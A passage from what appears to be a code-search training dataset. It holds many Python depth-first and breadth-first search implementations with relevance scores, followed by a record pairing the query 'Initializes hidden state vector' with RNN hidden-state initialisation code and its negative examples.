DFS(graph):\n stack = []\n actual_position = '1'\n stack.append(actual_position)\n visited_vertices = []\n\n while True:\n for neighbors in graph.values():\n try:\n neighbors.remove(actual_position) #usun sasiadow o wartosci aktualnej pozycji dla wszystich wierzcholkow grafu\n except ValueError:\n pass\n\n visited_vertices.append(actual_position) #odwiedzone wierzcholki\n\n try:\n actual_position = min(graph[actual_position]) #przejdz do sasiada o najnizszym numerze\n except ValueError:\n stack.remove(actual_position) # sciagamy ze stosu na stos\n if stack == []:\n return visited_vertices\n actual_position = stack.pop(-1) # ustaw z wierzchu stosu pozycje aktualna\n\n stack.append(actual_position) # dajemy na stos aktualna pozycje", "def breadthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n visited=[]\n \n node=dict()\n start=problem.getStartState()\n node['parent']=None\n node['direction']=None\n node['state']=start\n \n \n qu.push(node)\n lis.append(node)\n \n print qu.list\n while qu.isEmpty()!=True:\n node=qu.pop()\n pos=node['state']\n visited.append(pos)\n print visited\n if problem.isGoalState(pos):\n print \"found\"\n return getPath(problem,node)\n #break\n suc=problem.getSuccessors(pos)\n if suc ==None:\n continue \n \n print suc\n for step in suc:\n #if step not in dic :\n if step[0] not in visited:\n childnode={}\n childnode['parent']=pos\n childnode['direction']=step[1]\n childnode['state']=step[0]\n qu.push(childnode)\n lis.append(childnode)\n \n\n #util.raiseNotDefined()", "def fn(x):\n nonlocal ans \n if x < ans: \n if min(depth) == n: ans = x # all tiled\n else: \n i = min(depth)\n j = jj = depth.index(i) # (i, j)\n while jj < m and depth[jj] == depth[j]: jj += 1\n k = min(n - i, jj - j)\n for kk in reversed(range(1, k+1)): \n for jj in range(j, j+kk): depth[jj] += kk\n fn(x+1)\n for jj in range(j, j+kk): depth[jj] -= kk", "def dfs(self, starting_vertex, destination_vertex): # great for if you know the start and end, like a maze with 1 entry/1 exit\n visited = set() # create an empty 'set' to store visisted vertex, set sorts \n\n s = Stack() # create an empty Stack\n s.push([starting_vertex]) # push the starting vertex to the top of the stack \n\n while s.size() > 0: # loop if the size is greater than 0\n path = s.pop() # pop off the top element of the stack and store \n v = path[-1] # store the vertex from the end of path\n\n if v == destination_vertex: # if v is equal to the destination_vertex\n return path # return the path \n if v not in visited: # if v has not been visited yet \n visited.add(v) # add v to the vistied set \n\n for neighbor in self.vertices[v]: # loop through the neighbors\n path_copy = list(path) # make a copy of the path \n path_copy.append(neighbor) # append each neighbor to the back of the path copy \n s.push(path_copy) # push the path copy to the Stack", "def depthFirstSearch(problem):\n\n\n no = problem.getStartState()\n if (problem.isGoalState(no)):\n return []\n \n pilha = util.Stack()\n pilha.push((no, []))\n \n explorados = []\n \n while not pilha.isEmpty():\n (no, caminho) = pilha.pop()\n \n if problem.isGoalState(no):\n return caminho\n \n explorados.append(no)\n for filho in problem.getSuccessors(no):\n if (filho[0] not in explorados):\n pilha.push((filho[0], caminho + [filho[1]]))\n\n return []", "def depthOrBreadthFirstSearch(problem, container):\n firstNode = (problem.getStartState(), None, 0, None)#state, action to reach, incremental cost, parent node\n container.push(firstNode)\n visitedStates = []\n while (not container.isEmpty()):\n if problem.getNodesExpandedNum() > MAX_NODES_TO_EXPLORE:\n return None\n curNode = container.pop()\n if (problem.isGoalState(curNode[0])):\n return getStatePathFromNode(curNode, problem)\n for successor in problem.getSuccessors(curNode[0]):\n if not successor[0] in visitedStates:\n successorNode = (successor[0], successor[1], successor[2], curNode)\n visitedStates.append(successor[0])\n container.push(successorNode)\n return None", "def depthFirstSearch(problem):\n #print \"Start:\", problem.getStartState()\n #print \"Is the start a goal?\", problem.isGoalState(problem.getStartState())\n #print \"Start's successors:\", problem.getSuccessors(problem.getStartState())\n \n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n n = Directions.NORTH\n e = Directions.EAST\n\n #created a frontier Stack for DFS\n #Here the stack acts as a LIFO stack\n neighbourNodes = util.Stack()\n #created a list of moves which will be returned in then end\n moves = []\n #pushed the start node and empty moves list, onto the frontier stack\n neighbourNodes.push((problem.getStartState(),moves))\n #this is a set of nodes which have been seen, to avoid adding nodes already visited \n seenNodes = set()\n #condition evaluated based on the existence of elements in the frontier stack\n while not neighbourNodes.isEmpty():\n #last node in the stack is popped and its state and action is stored\n poppedNodeState, poppedNodeAction = neighbourNodes.pop()\n #condition to check if the node is already been visited\n if(poppedNodeState in seenNodes):\n #if yes then it just skips the iteration using the continue statement\n continue\n #condition to check if the current node is the goal node\n if problem.isGoalState(poppedNodeState):\n #if yes then return the action or moves to be performed list\n return poppedNodeAction\n #if not visited before then node is added to the seenNodes set\n seenNodes.add(poppedNodeState)\n #loop to parse the successor nodes and check and add them to the frontier stack\n for state, action, cost in problem.getSuccessors(poppedNodeState):\n #checking if the successor node has already been visited before\n if(state in seenNodes):\n #if yes then it skips that node\n continue\n #else it adds that successor along with it action appeneded with the already existing actions\n neighbourNodes.push((state, poppedNodeAction+[action]))\n #the list of moves if finally returned\n return moves\n #util.raiseNotDefined()", "def dft(self, starting_vertex):\n visited = set() # create an empty 'set' to store visisted vertex, set sorts \n\n s = Stack() # create an empty Stack \n s.push(starting_vertex) # push the starting_vertex to the top of the stack\n\n while s.size() > 0: # loop if the size is greater than 0\n v = s.pop() # pop off first element and store \n\n if v not in visited: # if v has not been visited yet\n visited.add(v) # add to the set \n print(v)\n for neighbor in self.vertices[v]: # loop through neighbors \n s.push(neighbor) # add each neighbor to the bottom of the stack", "def iterativeDeepeningSearch(problem):\n \"*** YOUR CODE HERE FOR TASK 1 ***\"\n\n # Retrieve the init state\n # state model ( (position, depth), path, cost)\n initState = ( (problem.getStartState(), 1) , ['Stop'], 0)\n limit = 1\n while True:\n # Initialization each iteration\n open = util.Stack()\n open.push(initState)\n closed = {}\n\n while not open.isEmpty():\n currState = open.pop()\n currPos = currState[0][0]\n currDepth = currState[0][1]\n currPath = currState[1]\n currCost = currState[2]\n\n closed[currPos] = currCost\n if currDepth <= limit:\n successors = problem.getSuccessors(currPos)\n if len(successors) > 0:\n nextDepth = currDepth + 1\n for each in successors:\n nextCost = currCost + each[2]\n nextPath = currPath + [each[1]]\n if each[0] not in closed.keys() or nextCost < closed[each[0]]:\n temp = ( (each[0], nextDepth), nextPath, nextCost)\n open.push(temp)\n if problem.isGoalState(temp[0][0]):\n return nextPath[1:]\n limit += 1", "def dfs(self, initialSt, goalSt): # Depth­First Search\n\n self.__reset_all_variables()\n\n start = time.perf_counter()\n\n frontier = deque() # deque will be treated as a stack\n frontier.append(initialSt)\n frontier_U_explored = set()\n frontier_U_explored.add(initialSt) # for fasten up the lookup time\n explored = set()\n\n max_frontier_size = 0\n max_ram_used = psutil.virtual_memory().used\n max_depth = initialSt.depth\n\n while len(frontier):\n currentState = frontier.pop()\n explored.add(currentState)\n frontier_U_explored.add(currentState)\n\n max_depth = currentState.depth if currentState.depth > max_depth else max_depth\n\n if goalSt == currentState:\n\n end = time.perf_counter()\n\n self.__success(initialSt,\n currentState,\n len(explored)-1,\n len(frontier),\n max_frontier_size,\n max_depth,\n end-start,\n max_ram_used,\n \"dfs\")\n return True\n\n h = currentState.children()\n h.reverse()\n for child in h:\n if child not in frontier_U_explored:\n frontier.append(child)\n frontier_U_explored.add(child)\n\n max_frontier_size = len(frontier) if len(\n frontier) > max_frontier_size else max_frontier_size\n max_ram_used = psutil.virtual_memory().used if psutil.virtual_memory(\n ).used > max_ram_used else max_ram_used\n\n return False", "def bfs(graph, i):\n visited = set()\n\n unexplored = deque()\n unexplored.append(i)\n\n while unexplored:\n curr = unexplored.popleft()\n visited.add(curr)\n edges = graph[curr]\n\n for edge in edges:\n if edge in visited:\n continue\n else:\n unexplored.appendleft(edge)\n\n return visited", "def graph_search(initial_state):\n path = [initial_state]\n current_node = copy.deepcopy(initial_state)\n while True:\n count = len(path)\n result = expand(current_node)\n for i in result:\n if i[1][1] == 0:\n path.append(i)\n break\n if len(path) > count:\n break\n else:\n current_node = result[-1]\n path.append(result[-1])\n return path", "def dfs_inorder_iter(graph, start_node):\n nonlocal t\n\n if visited[start_node]:\n return\n\n seen_once = {}\n nodes_seen = 0\n stack = [start_node]\n nodes_in_stack = set(stack)\n\n while stack:\n node = stack.pop()\n nodes_in_stack.remove(node)\n if not seen_once.get(node):\n # It's our first time visiting the node,\n # so put it back on the stack; we won't take\n # it off permanently until we're backtracking\n stack.append(node)\n nodes_in_stack.add(node)\n seen_once[node] = True\n for neighbor_node in graph[node]:\n if (not visited[neighbor_node]\n and not seen_once.get(neighbor_node)\n and neighbor_node not in nodes_in_stack):\n stack.append(neighbor_node)\n nodes_in_stack.add(neighbor_node)\n else:\n # We're backtracking\n visited[node] = True\n finishing_times[t] = node\n t += 1\n sccs[s] += 1", "def _explore(self, node, visited, skip_father=None):\n if node in visited:\n return\n\n visited = visited + [node]\n\n fathers_context = AbstractState()\n fathers_context.merge_fathers(node, skip_father, self)\n\n # Exclude path that dont bring further information\n if node in self.visited_all_paths:\n if self.visited_all_paths[node].does_not_bring_new_info(fathers_context):\n return\n else:\n self.visited_all_paths[node] = AbstractState()\n\n self.visited_all_paths[node].add(fathers_context)\n\n node.context[self.KEY] = fathers_context\n\n contains_call = fathers_context.analyze_node(node, self)\n node.context[self.KEY] = fathers_context\n\n sons = node.sons\n if contains_call and node.type in [NodeType.IF, NodeType.IFLOOP]:\n if _filter_if(node):\n son = sons[0]\n self._explore(son, visited, node)\n sons = sons[1:]\n else:\n son = sons[1]\n self._explore(son, visited, node)\n sons = [sons[0]]\n\n for son in sons:\n self._explore(son, visited)", "def solve(problem):\n\n # *** YOUR CODE HERE ***\n\n # The core of Iterative Deepening Search are iterations of Depth Limited\n # Search with given increasing depth.\n\n # A recursive version of Depth Limited Search\n def depth_limited_search(problem, limit):\n \"\"\"\n Return a list of nodes we traversed (or None).\n :param problem: the starting set up.\n :param limit: a given numeric depth limit.\n :return: a list of nodes.\n \"\"\"\n\n # in this case, we simply use a list to keep track of nodes we\n # traversed, instead of the data structure, Stack.\n path = list()\n visited = set() # as before, to prevent duplicated nodes\n root = problem.get_initial_state()\n\n def rec_dls(state, action, depth):\n\n visited.add(state)\n\n # if it is a goal\n if problem.goal_test(state):\n path.append((state, action))\n return path\n\n # or if it reaches a certain depth, but not a goal\n elif depth == 0:\n visited.remove(state)\n return None\n\n else:\n path.append([state, action])\n for successor, action, cost in problem.get_successors(state):\n if successor not in visited:\n # recursively expands the deepest node\n res = rec_dls(successor, action, depth-1)\n if res is not None:\n return res\n path.pop()\n visited.remove(state)\n\n # \"Stared From the Bottom\" (root)\n result = rec_dls(root, 'None', limit)\n # return the path if the we DID have achieved something\n if result is not None:\n return path\n\n import sys\n for depth in range(sys.maxsize): # depth from 0 to infinity\n print(\"Lower-bound of the optimal cost is {}\".format(depth))\n res2 = depth_limited_search(problem, depth)\n if res2 is not None:\n action_list = list()\n for move in res2:\n action_list.append(move[1]) # recall index 0 is the parent\n # do not forget a None returned in iteration 0 (with depth 0)\n action_list.remove('None')\n return action_list", "def breadthFirstSearch(problem):\r\n \"*** YOUR CODE HERE ***\"\r\n node = problem.getStartState()\r\n if (problem.isGoalState(node)):\r\n return [] # no need to make any moves of the start state is goal\r\n start = (node, 'NoDirection',0)\r\n\r\n frontier_queue = Queue() # queue for frontier\r\n frontier_queue.push(start) # frontier consists of only the start state\r\n\r\n explored_nodes = set()\r\n explored_track = {start:None} # keep a track of parent, parent of root node is None\r\n\r\n while not frontier_queue.isEmpty():\r\n state = frontier_queue.pop() # pop the top element from the queue \r\n explored_nodes.add(state)\r\n\r\n if problem.isGoalState(state[0]):\r\n return get_track(explored_track, state)\r\n\r\n neighbors_state = problem.getSuccessors(state[0])\r\n for neighbor in neighbors_state: # neighbor will be something like this ((34, 15), 'South', 1)\r\n if neighbor not in frontier_queue.list and neighbor not in explored_nodes:\r\n frontier_queue.push(neighbor)\r\n explored_track[neighbor] = state\r\n\r\n\r\n def get_track(explored_track, state):\r\n from game import Directions\r\n track_history = [state]\r\n track_history_direction = []\r\n leaf = state\r\n while (explored_track[leaf]) != start:\r\n track_history.append(explored_track[leaf])\r\n leaf = explored_track[leaf]\r\n\r\n for j in range (len(track_history),-1,-1):\r\n this_step = track_history[j-1]\r\n this_step = this_step[1]\r\n track_history_direction.append(this_step)\r\n return track_history_direction[:-1]", "def depthFirstSearch(problem):\n #\"*** YOUR CODE HERE ***\"\n\n \"\"\"\n Pseudocode:\n function G RAPH-S EARCH ( problem) returns a solution, or failure\n initialize the frontier using the initial state of problem\n initialize the explored set to be empty\n loop do\n if the frontier is empty then return failure\n choose a leaf node and remove it from the frontier\n if the node contains a goal state then return the corresponding solution\n add the node to the explored set\n expand the chosen node, adding the resulting nodes to the frontier\n only if not in the frontier or explored set\n\n \"\"\"\n frontier = util.Stack()\n #print 'Create frontier'\n initial_node = node(problem.getStartState(), 0, [], 0)#(state,depth,path_actions,path_cost)\n frontier.push(initial_node)\n #print 'Push ',repr(initial_node.state)\n frontierSet = set([initial_node.state])\n explored = set() #initialize the explored set to be empty\n\n while True:\n if frontier.isEmpty() == True: raise Exception, \"The frontier was emptied\"#if the frontier is empty then return failure\n currNode = frontier.pop()#HERE1\n frontierSet.remove(currNode.state)\n #print 'Remove',repr(currNode.state)\n #print 'State: ' + repr(currNode.state) + '. Depth: ' + repr(currNode.depth) + '. Path Cost: ' + repr(currNode.path_cost) + '. Path Actions: ' + repr(currNode.path_actions) + '.\\n'\n if problem.isGoalState(currNode.state) == True:\n print 'Goal reached!'\n return currNode.path_actions\n explored.add(currNode.state)\n for succ in problem.getSuccessors(currNode.state):\n #print 'Succ: ',repr(succ[0])\n succNode = node(succ[0], currNode.depth + 1, currNode.path_actions + [succ[1],], currNode.path_cost + succ[2])\n if (succNode.state not in explored):\n # Si hacemos estas verificaciones entonces cuando se encuentra que un estado que se quiere expandir ya esta en la frontera\n # eliminamos ese estado de la frontera y lo expandimos ahora. Osea, damos prioridad a los nodos nuevos\n if(succNode.state in frontierSet):\n # Recurso'i:\n for frontierNode in frontier.list:\n if frontierNode.state == succNode.state:\n frontier.list.remove(frontierNode)\n frontierSet.remove(frontierNode.state)\n # if ((succNode.state not in explored) and (succNode.state not in frontierSet)): \n # Alternativa segun el libro. Lo que se hace es que se da prioridad a los nodos viejos.\n\n # Aca no verificaba si ya esta en la frontera porque alteraba el orden en el que se visitan los nodos.\n # Por ejemplo cuando esta pendiente (se genero pero no se expandio) un hijo con un estado,\n # pero en un nivel mas profundo se vuelve a generar el mismo estado y se tiene que expandir.\n # Si seguimos el DFS creo que tendriamos que expandir ese nodo ahi y no en la primera llamada donde quedo pendiente.\n \n frontier.push(succNode)\n #print 'Push ',repr(succNode.state)\n frontierSet.add(succNode.state)\n\n #util.raiseNotDefined()", "def bfs_depth(g, s, discovered):\n\n level = [s]\n depth = 1\n\n while len(level) > 0:\n next_level = []\n\n for u in level:\n for e in g.incident_edges(u):\n v = e.opposite(u)\n if v not in discovered:\n discovered[v] = depth\n next_level.append(v)\n\n level = next_level\n depth += 1", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n\n #Creamos las estructuras de datos necesarias (stack y set)\n openNodes = util.Stack()\n closedNodes = set([])\n\n #Guardamos el nodo inicial\n node = Node(problem.getStartState(), '', 0, None)\n\n #Metemos el nodo en la pila\n openNodes.push(node)\n\n #Iteramos para cada nodo de la pila\n while True:\n if openNodes.isEmpty():\n break #ERROR: throw exception\n else :\n #Sacamos el nodo de arriba de la pila\n node = openNodes.pop()\n if problem.isGoalState(node.name):\n break\n else: #Expandimos los nodos sucesores del nodo n si no estan en closed\n for successor in problem.getSuccessors(node.name):\n n, p, c = successor\n succNode = Node(n, p, c, node)\n if nodeIsClosed(succNode, closedNodes) is False:\n #Metemos al sucesor en la pila\n openNodes.push(succNode)\n #Metemos el nodo n en closed\n closedNodes.add(node)\n\n #Devolvemos el camino al Goal\n return findPath(node)", "def search(board):\n depth = 0\n while True:\n result = depth_first(board, depth)\n if result:\n return result\n else:\n depth += 1", "def fn(k, i):\n ii = -1 \n for x in path:\n if gcd(nums[k], x) == 1: # coprime \n if path[x] and path[x][-1][1] > ii: \n ans[k] = path[x][-1][0]\n ii = path[x][-1][1]\n \n path.setdefault(nums[k], []).append((k, i))\n for kk in tree.get(k, []): \n if kk not in seen: \n seen.add(kk)\n fn(kk, i+1)\n path[nums[k]].pop()", "def breadth_first_graph_search(problem):\n node = Node(problem.initial)\n if problem.goal_test(node.state):\n return node\n frontier = collections.deque([node])\n explored = set()\n while frontier:\n node = frontier.popleft()\n explored.add(node.state)\n for child in node.expand(problem):\n if child.state not in explored and child not in frontier:\n if problem.goal_test(child.state):\n return child\n frontier.append(child)\n return None", "def bfs(graph,start):\n #keeps track of nodes to be visited\n queue = []\n #keeps track of nodes already visited\n explored = []\n queue.append(start)\n while queue:\n #remove first node from queue\n curr_node = queue.pop(0)\n #check if node is visited\n if curr_node not in explored:\n explored.append(curr_node)\n adjacent_nodes = graph[curr_node]\n #add adjacent nodes to queue\n for i in adjacent_nodes:\n queue.append(i)\n return explored", "def dfsIterative(m, start):\n \n s = [start] # list, use as stack\n visited = {start} # set\n out = []\n \n while len(s) > 0:\n cur = s.pop()\n pr('cur')\n out.append(cur)\n \n for vertex, connected in enumerate(m[cur]):\n # vertex is column in matrix (i)\n # connected is the True/False, 1 or 0 value\n if connected and not vertex in visited:\n s.append(vertex)\n visited.add(vertex)\n return out", "def recursion(adjlist, key):\n output.append(key)\n for neighbor in adjlist[key]:\n try:\n visited[neighbor]\n except KeyError:\n visited[neighbor] = True\n recursion(adjlist, neighbor)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n startState = problem.getStartState()\n visitedNodes = []\n actions = []\n fringe = util.Stack()\n cost = 0 \n if (problem.isGoalState(startState) == True):#if startState is the goalState\n return actions\n else :\n # Data Type Format : (currentState,actions,cost) based on errors I got :\\\n fringe.push((startState,actions,cost))\n while (fringe.isEmpty() == False) :\n currentState , actions , cost = fringe.pop()\n if(problem.isGoalState(currentState)):\n return actions\n \n elif ((currentState in visitedNodes) == False ):\n visitedNodes.append(currentState)\n currentNodeSuccessors = problem.getSuccessors(currentState)\n for node in currentNodeSuccessors :\n state , action , cost = node\n if ( (state in visitedNodes) == False ):\n newNode = (state , actions + [action] , cost)\n fringe.push(newNode)\n \n util.raiseNotDefined()", "def find_BFS(self, value):\n to_visit = [self]\n while to_visit:\n curr = to_visit.pop(0) # BFS -> .pop(0) -> queue \n if curr.value == value:\n return curr\n to_visit.extend(curr.children)", "def DFS(self, nDepth, treenode, state):\n \n visited = []\n visited.insert(0, (state, treenode))\n \n for index in range(0, nDepth-1): \n actions = self.priorProb(state)\n treenode.expansion(actions)\n treenode.updateU_value(actions)\n treenode, action = treenode.selection() \n state = state.do_move(action).copy()\n visited.insert(0, (state, treenode)) \n \n for index in range(0, len(visited)-1): \n if(visited[index][1].isLeaf() == True):\n value = self.leafEvaluation(visited[index][0])\n else: \n value = visited[index][1].backUp(value)\n visited[-1][1].updateQ_value(value)\n visited[-1][1].updateVisits()\n return visited[-1][1]", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n '''\n print \"Start:\", problem.getStartState()\n print \"Is the start a goal?\", problem.isGoalState((2,2))\n print \"Start's successors:\", problem.getSuccessors((1,1))\n suc=problem.getSuccessors(problem.getStartState())\n actionList=[]\n stateList=[]\n import random\n randomNum=random.randrange(0,len(suc),1)\n \n \n print len(suc)\n #for i in range(1000):\n while not problem.isGoalState(suc[randomNum][0]):\n\tprint randomNum\n\trandomNum=random.randrange(0,len(suc),1)\n\trandomAction=suc[randomNum][1]\n\t\n \t#print randomNum\n\tif suc[randomNum][0] not in stateList:\n\t\tstateList.append(suc[randomNum][0])\n\t\tactionList.append(randomAction)\n \t\tsuc=problem.getSuccessors(suc[randomNum][0]) \n \n #actionList.append(suc[randomNum][0])\n #if kiki==0:\n print actionList\n \n return actionList\n\n\n #util.raiseNotDefined()\n '''\n return DFS(problem,problem.getStartState(),[])", "def dft_recursive(self, starting_vertex, visited=None):\n # First, we set our initial condition\n if visited is None:\n # If no nodes have been visited, we create a set to store the nodes we visit\n visited = set()\n\n # Then we add the starting vertex to the visited set\n visited.add(starting_vertex)\n print(starting_vertex)\n\n # Call the function recursively on neighbors not visited\n # Lastly we write a for loop that will recursively call dft_recursive()\n for neighbor in self.vertices[starting_vertex]:\n # For each vertex, we check to see if any of the neighbors have already been visited\n if neighbor not in visited:\n # And if we find a neighbor that has not been visited, we recursively call dft_recursive() and pass it the neighbor and updated visited set\n self.dft_recursive(neighbor, visited)" ]
[ "0.7023242", "0.69994956", "0.6996934", "0.69497895", "0.687699", "0.68541056", "0.6832711", "0.6771857", "0.67687964", "0.67646325", "0.6733643", "0.6710491", "0.66814333", "0.6609042", "0.6607835", "0.6601756", "0.658722", "0.656834", "0.65571326", "0.6551692", "0.65476173", "0.6544411", "0.65432537", "0.65428394", "0.65371364", "0.65188205", "0.6498316", "0.6486503", "0.6477267", "0.6477145", "0.6474538", "0.64730555", "0.64630795", "0.6453125", "0.6452071", "0.6443783", "0.64398044", "0.64324284", "0.64298886", "0.6426134", "0.6411013", "0.6399126", "0.6397751", "0.63956195", "0.6389112", "0.6382903", "0.63799745", "0.6375594", "0.6364413", "0.63630766", "0.635966", "0.6341943", "0.63385886", "0.63379854", "0.63362396", "0.6325991", "0.63230306", "0.632006", "0.63197786", "0.6313956", "0.6296524", "0.6293255", "0.6279486", "0.62739116", "0.6263689", "0.6259722", "0.62564385", "0.62537014", "0.6244613", "0.62433535", "0.62390465", "0.6215699", "0.6214239", "0.6210049", "0.62053406", "0.6188635", "0.61772424", "0.61731935", "0.61630523", "0.61606586", "0.61589915", "0.6158314", "0.61520755", "0.6144154", "0.61409837", "0.61382306", "0.6134817", "0.61300164", "0.61288196", "0.611556", "0.61060095", "0.61055493", "0.608203", "0.60664254", "0.60614306", "0.60553896", "0.6051843", "0.6051518", "0.605137", "0.6042697", "0.603825" ]
0.0
-1
Initializes hidden state vector
def init_hidden(self, batch_size): weight = next(self.parameters()).data if self.train_on_gpu: if self.rnn_type == 'LSTM': hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_().cuda()) else: if self.rnn_type == 'LSTM': hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_(), weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) else: hidden = (weight.new(self.n_layers, batch_size, self.hidden_dim).zero_()) return hidden
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def initialize_hidden_state(self):\n initializer = tf.keras.initializers.Zeros()\n rnnten = initializer(shape=(self.batch, self.units))\n return rnnten", "def initialize_hidden_state(self):\n return tf.zeros(shape=(self.batch_size, self.enc_units))", "def init_state(self) -> None:\n self.state = np.zeros(self.shape, dtype=int)", "def init_hidden(self):\n # TODO ========================\n # initialize the hidden states to zero\n\n initial_hidden = torch.zeros(self.num_layers, self.batch_size, self.hidden_size)\n return initial_hidden # a parameter tensor of shape (self.num_layers, self.batch_size, self.hidden_size)", "def init_hidden(self, batch_size):\r\n \r\n self.hidden_state = (\r\n torch.zeros(((1+self.bidirectional)*self.num_layers,\r\n batch_size,\r\n self.hidden_size)).to(self.device),\r\n torch.zeros(((1+self.bidirectional)*self.num_layers, \r\n batch_size, \r\n self.hidden_size)).to(self.device))", "def initialize_hidden_state(self, batch_size):\n return tf.zeros((batch_size, self.enc_units))", "def initialize_state(self):\n # Initialize everything to zero\n self.stateC = self.initializer((self.nSym, 1))\n self.stateC_prev = self.initializer((self.nSym, 1))\n self.state = self.toNeural(self.stateC)\n self.state_prev = self.toNeural(matrix=self.stateC_prev)\n self.inpC = self.initializer((self.nSym, 1))\n self.inpS = self.toNeural(self.inpC)\n\n # Create full traces\n self.create_full_traces()\n\n # Initialize Lotka Volterra\n self.LV_Matrices()\n\n # Allocate Temperature and Lambda\n self.vars['T'] = 0\n self.vars['lambda'] = 0", "def init_hidden(self):\n pass", "def init_hidden(self):\n pass", "def initialize_state(self):\n super(InverseChain, self).initialize_state()", "def initHidden(self, batch_size):\n zero_hidden = torch.zeros(self.n_layers, batch_size, self.hidden_size)\n return zero_hidden", "def init_hidden(self, batch_size):\n return torch.zeros(()), torch.zeros(())", "def init_hidden_state(self, encoder_out: torch.Tensor):\n pass", "def init_states(self):\n self.filtered_state_means = None\n self.filtered_state_covariances = None\n self.predicted_state_means = None\n self.predicted_state_covariances = None\n self.smoothed_state_means = None\n self.smoothed_state_covariances = None", "def init_hidden(self):\n return Variable(torch.randn(1, self.hidden_size))", "def init_hidden_state(self,batch_size):\n h = torch.zeros(batch_size,self.decoder_dim).to(device) # (batch_size, decoder_dim)\n c = torch.zeros(batch_size,self.decoder_dim).to(device)\n return h, c", "def init_hidden_state(self, batch_size):\n hidden_state = tf.tile(self.initial_hidden_state[None, ...], [batch_size, 1])\n cell_state = tf.tile(self.initial_cell_state[None, ...], [batch_size, 1])\n return hidden_state, cell_state", "def initial_state(self, trainable=False):\n if trainable:\n self.initial_state = torch.zeros(self.hidden_size, requires_grad=True)\n else:\n return torch.zeros(self.hidden_size, requires_grad=True)", "def init_hidden(self):\n h0 = torch.zeros(self.num_layers, self.batch_size, self.hidden_size)\n\n return h0 # a parameter tensor of shape (self.num_layers, self.batch_size, self.hidden_size)", "def init_hidden_state(self, batch_size):\n h = torch.zeros(batch_size, self.decoder_dim).to(device) # (batch_size, decoder_dim)\n c = torch.zeros(batch_size, self.decoder_dim).to(device)\n return h, c", "def init_hidden_state(self, batch_size):\n h = torch.zeros(batch_size, self.decoder_dim).to(device) # (batch_size, decoder_dim)\n c = torch.zeros(batch_size, self.decoder_dim).to(device)\n return h, c", "def init_hidden_state(self, batch_size):\n h = torch.zeros(batch_size, self.decoder_dim).to(device) # (batch_size, decoder_dim)\n c = torch.zeros(batch_size, self.decoder_dim).to(device)\n return h, c", "def init_state(self, x):\n B, _, d_model = x.shape\n p_0 = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n self.gru_hidden = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n return p_0", "def init_state(self, x):\n B, _, d_model = x.shape\n p_0 = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n self.gru_hidden = torch.zeros((B, 2 * d_model), device=x.device, requires_grad=True)\n return p_0", "def init_hidden(self):\n if isinstance(self.rnn, nn.GRU):\n return torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device)\n elif isinstance(self.rnn, nn.LSTM):\n return (torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device),\n torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device))", "def init_hidden(self):\n if isinstance(self.rnn, nn.GRU):\n return torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device)\n elif isinstance(self.rnn, nn.LSTM):\n return (torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device),\n torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device))", "def init_hidden(self, mini_batch_size):\r\n #######################################\r\n ### BEGIN YOUR CODE HERE\r\n #######################################\r\n self.hidden = Variable(torch.zeros(2,mini_batch_size, self.hidden_size))\r\n if torch.cuda.is_available():\r\n self.hidden = self.hidden.cuda()\r\n #######################################\r\n ### END OF YOUR CODE\r\n #######################################\r", "def _initalize_state(self):\n\n self.memories.append(tf.tanh(\n tf.random_normal(shape=(self.memory_capacity, self.memory_vector_size), stddev=0.5)))\n self.ww_t.append(tf.nn.softmax(tf.range(self.memory_capacity, 0, -1, dtype=tf.float32)))\n self.rw_t.append(tf.nn.softmax(tf.range(self.memory_capacity, 0, -1, dtype=tf.float32)))\n self.r_t.append(tf.tanh(tf.random_normal(shape=(self.memory_vector_size,), stddev=0.5)))", "def init_hidden(self):\n if isinstance(self.rnn, nn.GRU) or isinstance(self.rnn, nn.RNN):\n return torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device)\n elif isinstance(self.rnn, nn.LSTM):\n return (torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device),\n torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device))", "def init_hidden(self):\n if isinstance(self.rnn, nn.GRU) or isinstance(self.rnn, nn.RNN):\n return torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device)\n elif isinstance(self.rnn, nn.LSTM):\n return (torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device),\n torch.zeros(self.num_directions * self.num_layers, 1, self.hidden_size, device=device))", "def _init_episode(self):\n # get states - one-hots\n self._states = np.zeros((self._size_state, self._size_state))\n\n # to_ones = np.random.permutation(self._size_state)[0:3]\n for x in xrange(self._size_state):\n # self._states[x][to_ones[x]] = 1\n self._states[x][x] = 1\n\n self._prob_transition = np.array([[.8,.2]])\n self._randomize()\n self._current_state = 0\n self._last_state = 0\n self._stage = 0\n self._since_flipped = 0", "def init_hidden(self, hidden_dim):\n enc_init_hx = mindspore.numpy.zeros(hidden_dim)\n\n enc_init_cx = mindspore.numpy.zeros(hidden_dim)\n\n return (enc_init_hx, enc_init_cx)", "def make_initial_state(self):\n return {\n 'h_rec':Variable(np.zeros((1, self.n_hidden), dtype=np.float32)),\n 'c_rec':Variable(np.zeros((1, self.n_hidden), dtype=np.float32)),\n 'h_gen':Variable(np.zeros((1, self.n_hidden), dtype=np.float32)),\n 'c_gen':Variable(np.zeros((1, self.n_hidden), dtype=np.float32))\n }", "def __init__(self, initial):\n self.initial = initial\n self.out = BitVec_Prop(initial)\n self.gen = 